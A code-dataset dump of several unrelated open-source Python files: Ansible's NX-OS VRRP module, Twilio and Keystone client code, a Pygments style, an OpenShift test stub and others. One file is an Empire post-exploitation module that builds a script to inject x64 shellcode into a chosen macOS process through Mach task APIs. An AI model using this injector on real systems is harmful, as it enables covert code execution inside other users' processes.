DISPLAY = pi3d.Display.create(w=W, h=H, layer=4, frames_per_second=10)
DISPLAY.set_background(255, 0.0, 0.0, 0.0) # transparent
shader = pi3d.Shader("uv_flat")
CAMERA = pi3d.Camera(is_3d=False)
font = pi3d.Font("/usr/share/fonts/truetype/freefont/FreeSerif.ttf",
(128, 255, 128, 255)) # blue green 1.0 alpha
keybd = pi3d.Keyboard()
tx = -DISPLAY.width / 2 + 250 # incr right, zero in middle
ty = DISPLAY.height / 2 - 300 # incr upwards
while DISPLAY.loop_running():
text = pi3d.String(font=font, string=time.strftime('%H:%M:%S', time.gmtime()),
camera=CAMERA, x=tx, y=ty, z=1.0, is_3d=False)
text.set_shader(shader)
text.draw()
time.sleep(0.1)
if keybd.read() == 27:
DISPLAY.destroy()
break
|
bsd-2-clause
|
hogarthj/ansible
|
lib/ansible/modules/network/nxos/nxos_vrrp.py
|
16
|
13019
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_vrrp
extends_documentation_fragment: nxos
version_added: "2.1"
short_description: Manages VRRP configuration on NX-OS switches.
description:
- Manages VRRP configuration on NX-OS switches.
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- VRRP feature needs to be enabled first on the system.
- SVIs must exist before using this module.
- Interface must be a L3 port before using this module.
- C(state=absent) removes the VRRP group if it exists on the device.
- VRRP cannot be configured on loopback interfaces.
options:
group:
description:
- VRRP group number.
required: true
interface:
description:
- Full name of interface that is being managed for VRRP.
required: true
interval:
description:
- Time interval between advertisement or 'default' keyword
required: false
default: 1
version_added: 2.6
priority:
description:
- VRRP priority or 'default' keyword
default: 100
preempt:
description:
- Enable/Disable preempt.
type: bool
default: 'yes'
vip:
description:
- VRRP virtual IP address or 'default' keyword
authentication:
description:
- Clear text authentication string or 'default' keyword
admin_state:
description:
- Used to enable or disable the VRRP process.
choices: ['shutdown', 'no shutdown', 'default']
default: shutdown
state:
description:
- Specify desired state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: Ensure vrrp group 100 and vip 10.1.100.1 is on vlan10
nxos_vrrp:
interface: vlan10
group: 100
vip: 10.1.100.1
- name: Ensure removal of the vrrp group config
# vip is required to ensure the user knows what they are removing
nxos_vrrp:
interface: vlan10
group: 100
vip: 10.1.100.1
state: absent
- name: Re-config with more params
nxos_vrrp:
interface: vlan10
group: 100
vip: 10.1.100.1
preempt: false
priority: 130
authentication: AUTHKEY
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["interface vlan10", "vrrp 150", "address 10.1.15.1",
"authentication text testing", "no shutdown"]
'''
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import get_capabilities, nxos_argument_spec
from ansible.module_utils.basic import AnsibleModule
PARAM_TO_DEFAULT_KEYMAP = {
'priority': '100',
'interval': '1',
'vip': '0.0.0.0',
'admin_state': 'shutdown',
}
def execute_show_command(command, module):
if 'show run' not in command:
output = 'json'
else:
output = 'text'
commands = [{
'command': command,
'output': output,
}]
return run_commands(module, commands)[0]
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def get_interface_type(interface):
if interface.upper().startswith('ET'):
return 'ethernet'
elif interface.upper().startswith('VL'):
return 'svi'
elif interface.upper().startswith('LO'):
return 'loopback'
elif interface.upper().startswith('MG'):
return 'management'
elif interface.upper().startswith('MA'):
return 'management'
elif interface.upper().startswith('PO'):
return 'portchannel'
else:
return 'unknown'
def is_default(interface, module):
command = 'show run interface {0}'.format(interface)
try:
body = execute_show_command(command, module)
if 'invalid' in body.lower():
return 'DNE'
else:
raw_list = body.split('\n')
if raw_list[-1].startswith('interface'):
return True
else:
return False
except (KeyError):
return 'DNE'
def get_interface_mode(interface, intf_type, module):
command = 'show interface {0}'.format(interface)
interface = {}
mode = 'unknown'
body = execute_show_command(command, module)
interface_table = body['TABLE_interface']['ROW_interface']
name = interface_table.get('interface')
if intf_type in ['ethernet', 'portchannel']:
mode = str(interface_table.get('eth_mode', 'layer3'))
if mode == 'access' or mode == 'trunk':
mode = 'layer2'
elif intf_type == 'svi':
mode = 'layer3'
return mode, name
def get_vrr_status(group, module, interface):
command = 'show run all | section interface.{0}$'.format(interface)
body = execute_show_command(command, module)
vrf_index = None
admin_state = 'shutdown'
if body:
splitted_body = body.splitlines()
for index in range(0, len(splitted_body) - 1):
if splitted_body[index].strip() == 'vrrp {0}'.format(group):
vrf_index = index
vrf_section = splitted_body[vrf_index::]
for line in vrf_section:
if line.strip() == 'no shutdown':
admin_state = 'no shutdown'
break
return admin_state
def get_existing_vrrp(interface, group, module, name):
command = 'show vrrp detail interface {0}'.format(interface)
body = execute_show_command(command, module)
vrrp = {}
vrrp_key = {
'sh_group_id': 'group',
'sh_vip_addr': 'vip',
'sh_priority': 'priority',
'sh_group_preempt': 'preempt',
'sh_auth_text': 'authentication',
'sh_adv_interval': 'interval'
}
try:
vrrp_table = body['TABLE_vrrp_group']
except (AttributeError, IndexError, TypeError):
return {}
if isinstance(vrrp_table, dict):
vrrp_table = [vrrp_table]
for each_vrrp in vrrp_table:
vrrp_row = each_vrrp['ROW_vrrp_group']
parsed_vrrp = apply_key_map(vrrp_key, vrrp_row)
if parsed_vrrp['preempt'] == 'Disable':
parsed_vrrp['preempt'] = False
elif parsed_vrrp['preempt'] == 'Enable':
parsed_vrrp['preempt'] = True
if parsed_vrrp['group'] == group:
parsed_vrrp['admin_state'] = get_vrr_status(group, module, name)
return parsed_vrrp
return vrrp
def get_commands_config_vrrp(delta, existing, group):
commands = []
CMDS = {
'priority': 'priority {0}',
'preempt': 'preempt',
'vip': 'address {0}',
'interval': 'advertisement-interval {0}',
'auth': 'authentication text {0}',
'admin_state': '{0}',
}
for arg in ['vip', 'priority', 'interval', 'admin_state']:
val = delta.get(arg)
if val == 'default':
val = PARAM_TO_DEFAULT_KEYMAP.get(arg)
if val != existing.get(arg):
commands.append((CMDS.get(arg)).format(val))
elif val:
commands.append((CMDS.get(arg)).format(val))
preempt = delta.get('preempt')
auth = delta.get('authentication')
if preempt:
commands.append(CMDS.get('preempt'))
elif preempt is False:
commands.append('no ' + CMDS.get('preempt'))
if auth:
if auth != 'default':
commands.append((CMDS.get('auth')).format(auth))
elif existing.get('authentication'):
commands.append('no authentication')
if commands:
commands.insert(0, 'vrrp {0}'.format(group))
return commands
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def validate_params(param, module):
value = module.params[param]
if param == 'group':
try:
if (int(value) < 1 or int(value) > 255):
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'group' must be an integer between"
" 1 and 255", group=value)
elif param == 'priority':
try:
if (int(value) < 1 or int(value) > 254):
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'priority' must be an integer "
"between 1 and 254", priority=value)
def main():
argument_spec = dict(
group=dict(required=True, type='str'),
interface=dict(required=True),
interval=dict(required=False, type='str'),
priority=dict(required=False, type='str'),
preempt=dict(required=False, type='bool'),
vip=dict(required=False, type='str'),
admin_state=dict(required=False, type='str',
choices=['shutdown', 'no shutdown', 'default'],
default='shutdown'),
authentication=dict(required=False, type='str'),
state=dict(choices=['absent', 'present'], required=False, default='present')
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
warnings = list()
results = {'changed': False, 'commands': [], 'warnings': warnings}
state = module.params['state']
interface = module.params['interface'].lower()
group = module.params['group']
priority = module.params['priority']
interval = module.params['interval']
preempt = module.params['preempt']
vip = module.params['vip']
authentication = module.params['authentication']
admin_state = module.params['admin_state']
device_info = get_capabilities(module)
network_api = device_info.get('network_api', 'nxapi')
if state == 'present' and not vip:
module.fail_json(msg='the "vip" param is required when state=present')
intf_type = get_interface_type(interface)
if (intf_type != 'ethernet' and network_api == 'cliconf'):
if is_default(interface, module) == 'DNE':
module.fail_json(msg='That interface does not exist yet. Create '
'it first.', interface=interface)
if intf_type == 'loopback':
module.fail_json(msg="Loopback interfaces don't support VRRP.",
interface=interface)
mode, name = get_interface_mode(interface, intf_type, module)
if mode == 'layer2':
module.fail_json(msg='That interface is a layer2 port.\nMake it '
'a layer 3 port first.', interface=interface)
args = dict(group=group, priority=priority, preempt=preempt,
vip=vip, authentication=authentication, interval=interval,
admin_state=admin_state)
proposed = dict((k, v) for k, v in args.items() if v is not None)
existing = get_existing_vrrp(interface, group, module, name)
changed = False
end_state = existing
commands = []
if state == 'present':
delta = dict(
set(proposed.items()).difference(existing.items()))
if delta:
command = get_commands_config_vrrp(delta, existing, group)
if command:
commands.append(command)
elif state == 'absent':
if existing:
commands.append(['no vrrp {0}'.format(group)])
if commands:
commands.insert(0, ['interface {0}'.format(interface)])
commands = flatten_list(commands)
results['commands'] = commands
results['changed'] = True
if not module.check_mode:
load_config(module, commands)
if 'configure' in commands:
commands.pop(0)
module.exit_json(**results)
if __name__ == '__main__':
main()
|
gpl-3.0
|
chouseknecht/openshift-restclient-python
|
openshift/test/test_v1_project_spec.py
|
1
|
4225
|
# coding: utf-8
"""
OpenShift API (with Kubernetes)
OpenShift provides builds, application lifecycle, image content management, and administrative policy on top of Kubernetes. The API allows consistent management of those objects. All API operations are authenticated via an Authorization bearer token that is provided for service accounts as a generated secret (in JWT form) or via the native OAuth endpoint located at /oauth/authorize. Core infrastructure components may use openshift.client certificates that require no authentication. All API operations return a 'resourceVersion' string that represents the version of the object in the underlying storage. The standard LIST operation performs a snapshot read of the underlying objects, returning a resourceVersion representing a consistent version of the listed objects. The WATCH operation allows all updates to a set of objects after the provided resourceVersion to be observed by a openshift.client. By listing and beginning a watch from the returned resourceVersion, openshift.clients may observe a consistent view of the state of one or more objects. Note that WATCH always returns the update after the provided resourceVersion. Watch may be extended a limited time in the past - using etcd 2 the watch window is 1000 events (which on a large cluster may only be a few tens of seconds) so openshift.clients must explicitly handle the \"watch to old error\" by re-listing. Objects are divided into two rough categories - those that have a lifecycle and must reflect the state of the cluster, and those that have no state. Objects with lifecycle typically have three main sections: * 'metadata' common to all objects * a 'spec' that represents the desired state * a 'status' that represents how much of the desired state is reflected on the cluster at the current time Objects that have no state have 'metadata' but may lack a 'spec' or 'status' section. Objects are divided into those that are namespace scoped (only exist inside of a namespace) and those that are cluster scoped (exist outside of a namespace). A namespace scoped resource will be deleted when the namespace is deleted and cannot be created if the namespace has not yet been created or is in the process of deletion. Cluster scoped resources are typically only accessible to admins - resources like nodes, persistent volumes, and cluster policy. All objects have a schema that is a combination of the 'kind' and 'apiVersion' fields. This schema is additive only for any given version - no backwards incompatible changes are allowed without incrementing the apiVersion. The server will return and accept a number of standard responses that share a common schema - for instance, the common error type is 'metav1.Status' (described below) and will be returned on any error from the API server. The API is available in multiple serialization formats - the default is JSON (Accept: application/json and Content-Type: application/json) but openshift.clients may also use YAML (application/yaml) or the native Protobuf schema (application/vnd.kubernetes.protobuf). Note that the format of the WATCH API call is slightly different - for JSON it returns newline delimited objects while for Protobuf it returns length-delimited frames (4 bytes in network-order) that contain a 'versioned.Watch' Protobuf object. See the OpenShift documentation at https://docs.openshift.org for more information.
OpenAPI spec version: latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import openshift.client
from kubernetes.client.rest import ApiException
from openshift.client.models.v1_project_spec import V1ProjectSpec
class TestV1ProjectSpec(unittest.TestCase):
""" V1ProjectSpec unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1ProjectSpec(self):
"""
Test V1ProjectSpec
"""
# FIXME: construct object with mandatory attributes with example values
#model = openshift.client.models.v1_project_spec.V1ProjectSpec()
pass
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
YeelerG/twilio-python
|
twilio/rest/resources/phone_numbers.py
|
11
|
11396
|
import re
from twilio.exceptions import TwilioException
from .util import change_dict_key, transform_params
from .util import UNSET_TIMEOUT
from . import InstanceResource, ListResource
TYPES = {"local": "Local", "tollfree": "TollFree", "mobile": "Mobile"}
class AvailablePhoneNumber(InstanceResource):
""" An available phone number resource
.. attribute:: friendly_name
A nicely-formatted version of the phone number.
.. attribute:: phone_number
The phone number, in E.164 (i.e. "+1") format.
.. attribute:: lata
The LATA of this phone number.
.. attribute:: rate_center
The rate center of this phone number.
.. attribute:: latitude
The latitude coordinate of this phone number.
.. attribute:: longitude
The longitude coordinate of this phone number.
.. attribute:: region
The two-letter state or province abbreviation of this phone number.
.. attribute:: postal_code
The postal (zip) code of this phone number.
.. attribute:: iso_country
The country for this number
.. attribute:: address_requirements
Whether the phone number requires you or your customer to have an
Address registered with Twilio. Possible values are 'none', 'any',
'local', or 'foreign'.
.. attribute:: beta
(boolean) Phone numbers new to the Twilio platform are marked as beta.
"""
def __init__(self, parent):
# Available Phone Numbers have no sid.
super(AvailablePhoneNumber, self).__init__(parent, "")
self.name = ""
def purchase(self, **kwargs):
return self.parent.purchase(phone_number=self.phone_number,
**kwargs)
class AvailablePhoneNumbers(ListResource):
name = "AvailablePhoneNumbers"
key = "available_phone_numbers"
instance = AvailablePhoneNumber
def __init__(self, base_uri, auth, timeout, phone_numbers):
super(AvailablePhoneNumbers, self).__init__(base_uri, auth, timeout)
self.phone_numbers = phone_numbers
def get(self, sid):
raise TwilioException("Individual AvailablePhoneNumbers have no sid")
def list(self, type="local", country="US", region=None, postal_code=None,
lata=None, rate_center=None, **kwargs):
"""
Search for phone numbers
"""
kwargs["in_region"] = kwargs.get("in_region", region)
kwargs["in_postal_code"] = kwargs.get("in_postal_code", postal_code)
kwargs["in_lata"] = kwargs.get("in_lata", lata)
kwargs["in_rate_center"] = kwargs.get("in_rate_center", rate_center)
params = transform_params(kwargs)
uri = "%s/%s/%s" % (self.uri, country, TYPES[type])
resp, page = self.request("GET", uri, params=params)
return [self.load_instance(i) for i in page[self.key]]
def load_instance(self, data):
instance = self.instance(self.phone_numbers)
instance.load(data)
instance.load_subresources()
return instance
class PhoneNumber(InstanceResource):
""" An IncomingPhoneNumber object
.. attribute:: sid
A 34 character string that uniquely identifies this resource.
.. attribute:: date_created
The date that this resource was created, given as GMT RFC 2822 format.
.. attribute:: date_updated
The date that this resource was last updated, in GMT RFC 2822 format.
.. attribute:: friendly_name
A human readable descriptive text for this resource, up to 64 characters
long. By default, the FriendlyName is a nicely formatted version of
the phone number.
.. attribute:: account_sid
The unique id of the Account responsible for this phone number.
.. attribute:: phone_number
The incoming phone number. e.g., +16175551212 (E.164 format)
.. attribute:: api_version
Calls to this phone number will start a new TwiML session with this
API version.
.. attribute:: voice_caller_id_lookup
Look up the caller's caller-ID name from the CNAM database (additional
charges apply). Either true or false.
.. attribute:: voice_url
The URL Twilio will request when this phone number receives a call.
.. attribute:: voice_method
The HTTP method Twilio will use when requesting the above Url.
Either GET or POST.
.. attribute:: voice_fallback_url
The URL that Twilio will request if an error occurs retrieving or
executing the TwiML requested by Url.
.. attribute:: voice_fallback_method
The HTTP method Twilio will use when requesting the VoiceFallbackUrl.
Either GET or POST.
.. attribute:: status_callback
The URL that Twilio will request to pass status parameters (such as
call ended) to your application.
.. attribute:: status_callback_method
The HTTP method Twilio will use to make requests to the
StatusCallback URL. Either GET or POST.
.. attribute:: sms_url
The URL Twilio will request when receiving an incoming SMS message
to this number.
.. attribute:: sms_method
The HTTP method Twilio will use when making requests to the SmsUrl.
Either GET or POST.
.. attribute:: sms_fallback_url
The URL that Twilio will request if an error occurs retrieving or
executing the TwiML from SmsUrl.
.. attribute:: sms_fallback_method
The HTTP method Twilio will use when requesting the above URL.
Either GET or POST.
.. attribute:: uri
The URI for this resource, relative to https://api.twilio.com.
.. attribute:: beta
(boolean) Phone numbers new to the Twilio platform are marked as beta.
"""
def load(self, entries):
""" Set the proper Account owner of this phone number """
# Only check if entries has a uri
if "account_sid" in entries:
# Parse the parent's uri to get the scheme and base
uri = re.sub(r'AC(.*)', entries["account_sid"],
self.parent.base_uri)
self.parent = PhoneNumbers(
uri,
self.parent.auth,
self.parent.timeout
)
self.base_uri = self.parent.uri
super(PhoneNumber, self).load(entries)
def transfer(self, account_sid):
"""
Transfer the phone number with sid from the current account to another
identified by account_sid
"""
a = self.parent.transfer(self.name, account_sid)
self.load(a.__dict__)
def update(self, **kwargs):
"""
Update this phone number instance.
"""
kwargs_copy = dict(kwargs)
change_dict_key(kwargs_copy, from_key="status_callback_url",
to_key="status_callback")
a = self.parent.update(self.name, **kwargs_copy)
self.load(a.__dict__)
def delete(self):
"""
Release this phone number from your account. Twilio will no longer
answer calls to this number, and you will stop being billed the monthly
phone number fees. The phone number will eventually be recycled and
potentially given to another customer, so use with care. If you make a
mistake, contact us... we may be able to give you the number back.
"""
return self.parent.delete(self.name)
class PhoneNumbers(ListResource):
name = "IncomingPhoneNumbers"
key = "incoming_phone_numbers"
instance = PhoneNumber
def __init__(self, base_uri, auth, timeout=UNSET_TIMEOUT):
super(PhoneNumbers, self).__init__(base_uri, auth, timeout)
self.available_phone_numbers = \
AvailablePhoneNumbers(base_uri, auth, timeout, self)
def delete(self, sid):
"""
Release this phone number from your account. Twilio will no longer
answer calls to this number, and you will stop being billed the
monthly phone number fees. The phone number will eventually be
recycled and potentially given to another customer, so use with care.
If you make a mistake, contact us... we may be able to give you the
number back.
"""
return self.delete_instance(sid)
def list(self, type=None, **kwargs):
"""
:param phone_number: Show phone numbers that match this pattern.
:param friendly_name: Show phone numbers with this friendly name
:param type: Filter numbers by type. Available types are
'local', 'mobile', or 'tollfree'
You can specify partial numbers and use '*' as a wildcard.
"""
uri = self.uri
if type:
uri = "%s/%s" % (self.uri, TYPES[type])
params = transform_params(kwargs)
resp, page = self.request("GET", uri, params=params)
return [self.load_instance(i) for i in page[self.key]]
def purchase(self, status_callback_url=None, **kwargs):
"""
Attempt to purchase the specified number. The only required parameters
are **either** phone_number or area_code
:returns: Returns a :class:`PhoneNumber` instance on success,
:data:`False` on failure
:raises: A :exc:`TypeError` if neither phone_number or area_code
is specified.
"""
kwargs["StatusCallback"] = kwargs.get("status_callback",
status_callback_url)
if 'phone_number' not in kwargs and 'area_code' not in kwargs:
raise TypeError("phone_number or area_code is required")
number_type = kwargs.pop('type', False)
uri = self.uri
if number_type:
uri = "%s/%s" % (self.uri, TYPES[number_type])
params = transform_params(kwargs)
resp, instance = self.request('POST', uri, data=params)
return self.load_instance(instance)
def search(self, **kwargs):
"""
:param type: The type of phone number to search for.
:param str country: Only show numbers for this country (iso2)
:param str region: When searching the US, show numbers in this state
:param str postal_code: Only show numbers in this area code
:param str rate_center: US only.
:param tuple near_lat_long: Find close numbers within Distance miles.
:param integer distance: Search radius for a Near- query in miles.
:param boolean beta: Whether to include numbers new to the Twilio
platform.
"""
return self.available_phone_numbers.list(**kwargs)
def transfer(self, sid, account_sid):
"""
Transfer the phone number with sid from the current account to another
identified by account_sid
"""
return self.update(sid, account_sid=account_sid)
def update(self, sid, **kwargs):
"""
Update this phone number instance
"""
kwargs_copy = dict(kwargs)
change_dict_key(kwargs_copy, from_key="status_callback_url",
to_key="status_callback")
if "application_sid" in kwargs_copy:
for sid_type in ["voice_application_sid", "sms_application_sid"]:
if sid_type not in kwargs_copy:
kwargs_copy[sid_type] = kwargs_copy["application_sid"]
del kwargs_copy["application_sid"]
return self.update_instance(sid, kwargs_copy)
|
mit
|
deapubhi/myblog
|
node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/styles/default.py
|
364
|
2532
|
# -*- coding: utf-8 -*-
"""
pygments.styles.default
~~~~~~~~~~~~~~~~~~~~~~~
The default highlighting style.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class DefaultStyle(Style):
"""
The default style (inspired by Emacs 22).
"""
background_color = "#f8f8f8"
default_style = ""
styles = {
Whitespace: "#bbbbbb",
Comment: "italic #408080",
Comment.Preproc: "noitalic #BC7A00",
#Keyword: "bold #AA22FF",
Keyword: "bold #008000",
Keyword.Pseudo: "nobold",
Keyword.Type: "nobold #B00040",
Operator: "#666666",
Operator.Word: "bold #AA22FF",
Name.Builtin: "#008000",
Name.Function: "#0000FF",
Name.Class: "bold #0000FF",
Name.Namespace: "bold #0000FF",
Name.Exception: "bold #D2413A",
Name.Variable: "#19177C",
Name.Constant: "#880000",
Name.Label: "#A0A000",
Name.Entity: "bold #999999",
Name.Attribute: "#7D9029",
Name.Tag: "bold #008000",
Name.Decorator: "#AA22FF",
String: "#BA2121",
String.Doc: "italic",
String.Interpol: "bold #BB6688",
String.Escape: "bold #BB6622",
String.Regex: "#BB6688",
#String.Symbol: "#B8860B",
String.Symbol: "#19177C",
String.Other: "#008000",
Number: "#666666",
Generic.Heading: "bold #000080",
Generic.Subheading: "bold #800080",
Generic.Deleted: "#A00000",
Generic.Inserted: "#00A000",
Generic.Error: "#FF0000",
Generic.Emph: "italic",
Generic.Strong: "bold",
Generic.Prompt: "bold #000080",
Generic.Output: "#888",
Generic.Traceback: "#04D",
Error: "border:#FF0000"
}
|
mit
|
Hackplayers/Empire-mod-Hackplayers
|
lib/modules/python/management/osx/shellcodeinject64.py
|
12
|
6833
|
from lib.common import helpers
import os
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Shellcode Inject x64',
# list of one or more authors for the module
'Author': ['@xorrior','@midnite_runr'],
# more verbose multi-line description of the module
'Description': ('Inject shellcode into a x64 bit process'),
# True if the module needs to run in the background
'Background': False,
# File extension to save the file as
'OutputExtension': None,
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
'comment',
'https://github.com/secretsquirrel/osx_mach_stuff/blob/master/inject.c'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent': {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to run the module on',
'Required' : True,
'Value' : ''
},
'PID': {
'Description' : 'Process ID',
'Required' : True,
'Value' : ''
},
'Shellcode': {
'Description' : 'local path to bin file containing x64 shellcode',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
processID = self.options['PID']['Value']
shellcodeBinPath = self.options['Shellcode']['Value']
if not os.path.exists(shellcodeBinPath):
print helpers.color("[!] Shellcode bin file not found.")
return ""
f = open(shellcodeBinPath, 'rb')
shellcode = base64.b64encode(f.read())
f.close()
script = """
from ctypes import *
def run():
import sys
import os
import struct
import base64
import ctypes
STACK_SIZE = 65536
VM_FLAGS_ANYWHERE = 0x0001
VM_PROT_READ = 0x01
VM_PROT_EXECUTE = 0x04
x86_THREAD_STATE64 = 4
KERN_SUCCESS = 0
remoteTask = ctypes.c_long()
remoteCode64 = ctypes.c_uint64()
remoteStack64 = ctypes.c_uint64()
remoteThread = ctypes.c_long()
cdll.LoadLibrary('/usr/lib/libc.dylib')
libc = CDLL('/usr/lib/libc.dylib')
encshellcode = "[SC]"
shellcode = base64.b64decode(encshellcode)
pid = [PID]
class remoteThreadState64(ctypes.Structure):
_fields_ = [
("__rax", ctypes.c_uint64),
("__rbx", ctypes.c_uint64),
("__rcx", ctypes.c_uint64),
("__rdx", ctypes.c_uint64),
("__rdi", ctypes.c_uint64),
("__rsi", ctypes.c_uint64),
("__rbp", ctypes.c_uint64),
("__rsp", ctypes.c_uint64),
("__r8", ctypes.c_uint64),
("__r9", ctypes.c_uint64),
("__r10", ctypes.c_uint64),
("__r11", ctypes.c_uint64),
("__r12", ctypes.c_uint64),
("__r13", ctypes.c_uint64),
("__r14", ctypes.c_uint64),
("__r15", ctypes.c_uint64),
("__rip", ctypes.c_uint64),
("__rflags", ctypes.c_uint64),
("__cs", ctypes.c_uint64),
("__fs", ctypes.c_uint64),
("__gs", ctypes.c_uint64)
]
result = libc.task_for_pid(libc.mach_task_self(), pid, ctypes.byref(remoteTask))
if (result != KERN_SUCCESS):
print "Unable to get task for pid\\n"
return ""
result = libc.mach_vm_allocate(remoteTask, ctypes.byref(remoteStack64), STACK_SIZE, VM_FLAGS_ANYWHERE)
if result != KERN_SUCCESS:
print "Unable to allocate memory for the remote stack\\n"
return ""
result = libc.mach_vm_allocate(remoteTask, ctypes.byref(remoteCode64),len(shellcode),VM_FLAGS_ANYWHERE)
if result != KERN_SUCCESS:
print "Unable to allocate memory for the remote code\\n"
return ""
longptr = ctypes.POINTER(ctypes.c_ulong)
shellcodePtr = ctypes.cast(shellcode, longptr)
result = libc.mach_vm_write(remoteTask, remoteCode64, shellcodePtr, len(shellcode))
if result != KERN_SUCCESS:
print "Unable to write process memory\\n"
return ""
result = libc.vm_protect(remoteTask, remoteCode64, len(shellcode),False, (VM_PROT_READ | VM_PROT_EXECUTE))
if result != KERN_SUCCESS:
print "Unable to modify permissions for memory\\n"
return ""
emptyarray = bytearray(sys.getsizeof(remoteThreadState64))
threadstate64 = remoteThreadState64.from_buffer_copy(emptyarray)
remoteStack64 = int(remoteStack64.value)
remoteStack64 += (STACK_SIZE / 2)
remoteStack64 -= 8
remoteStack64 = ctypes.c_uint64(remoteStack64)
threadstate64.__rip = remoteCode64
threadstate64.__rsp = remoteStack64
threadstate64.__rbp = remoteStack64
x86_THREAD_STATE64_COUNT = ctypes.sizeof(threadstate64) / ctypes.sizeof(ctypes.c_int)
result = libc.thread_create_running(remoteTask,x86_THREAD_STATE64, ctypes.byref(threadstate64), x86_THREAD_STATE64_COUNT, ctypes.byref(remoteThread))
if (result != KERN_SUCCESS):
print "Unable to execute remote thread in process"
return ""
print "Injected shellcode into process successfully!"
run()
"""
script = script.replace('[SC]', shellcode)
script = script.replace('[PID]', processID)
return script
|
bsd-3-clause
|
sdpp/python-keystoneclient
|
keystoneclient/auth/identity/access.py
|
6
|
1916
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient.auth.identity import base
from keystoneclient import utils
class AccessInfoPlugin(base.BaseIdentityPlugin):
"""A plugin that turns an existing AccessInfo object into a usable plugin.
There are cases where reuse of an auth_ref or AccessInfo object is
warranted such as from a cache, from auth_token middleware, or another
source.
Turn the existing access info object into an identity plugin. This plugin
cannot be refreshed as the AccessInfo object does not contain any
authorizing information.
:param auth_ref: the existing AccessInfo object.
:type auth_ref: keystoneclient.access.AccessInfo
:param auth_url: the url where this AccessInfo was retrieved from. Required
if using the AUTH_INTERFACE with get_endpoint. (optional)
"""
@utils.positional()
def __init__(self, auth_ref, auth_url=None):
super(AccessInfoPlugin, self).__init__(auth_url=auth_url,
reauthenticate=False)
self.auth_ref = auth_ref
def get_auth_ref(self, session, **kwargs):
return self.auth_ref
def invalidate(self):
# NOTE(jamielennox): Don't allow the default invalidation to occur
# because on next authentication request we will only get the same
# auth_ref object again.
return False
|
apache-2.0
|
alfa-addon/addon
|
plugin.video.alfa/lib/requests_toolbelt/__init__.py
|
12
|
1181
|
# -*- coding: utf-8 -*-
"""
requests-toolbelt
=================
See http://toolbelt.rtfd.org/ for documentation
:copyright: (c) 2014 by Ian Cordasco and Cory Benfield
:license: Apache v2.0, see LICENSE for more details
"""
from .adapters import SSLAdapter, SourceAddressAdapter
from .auth.guess import GuessAuth
from .multipart import (
MultipartEncoder, MultipartEncoderMonitor, MultipartDecoder,
ImproperBodyPartContentException, NonMultipartContentTypeException
)
from .streaming_iterator import StreamingIterator
from .utils.user_agent import user_agent
__title__ = 'requests-toolbelt'
__authors__ = 'Ian Cordasco, Cory Benfield'
__license__ = 'Apache v2.0'
__copyright__ = 'Copyright 2014 Ian Cordasco, Cory Benfield'
__version__ = '0.9.1'
__version_info__ = tuple(int(i) for i in __version__.split('.'))
__all__ = [
'GuessAuth', 'MultipartEncoder', 'MultipartEncoderMonitor',
'MultipartDecoder', 'SSLAdapter', 'SourceAddressAdapter',
'StreamingIterator', 'user_agent', 'ImproperBodyPartContentException',
'NonMultipartContentTypeException', '__title__', '__authors__',
'__license__', '__copyright__', '__version__', '__version_info__',
]
|
gpl-3.0
|
paolodedios/tensorflow
|
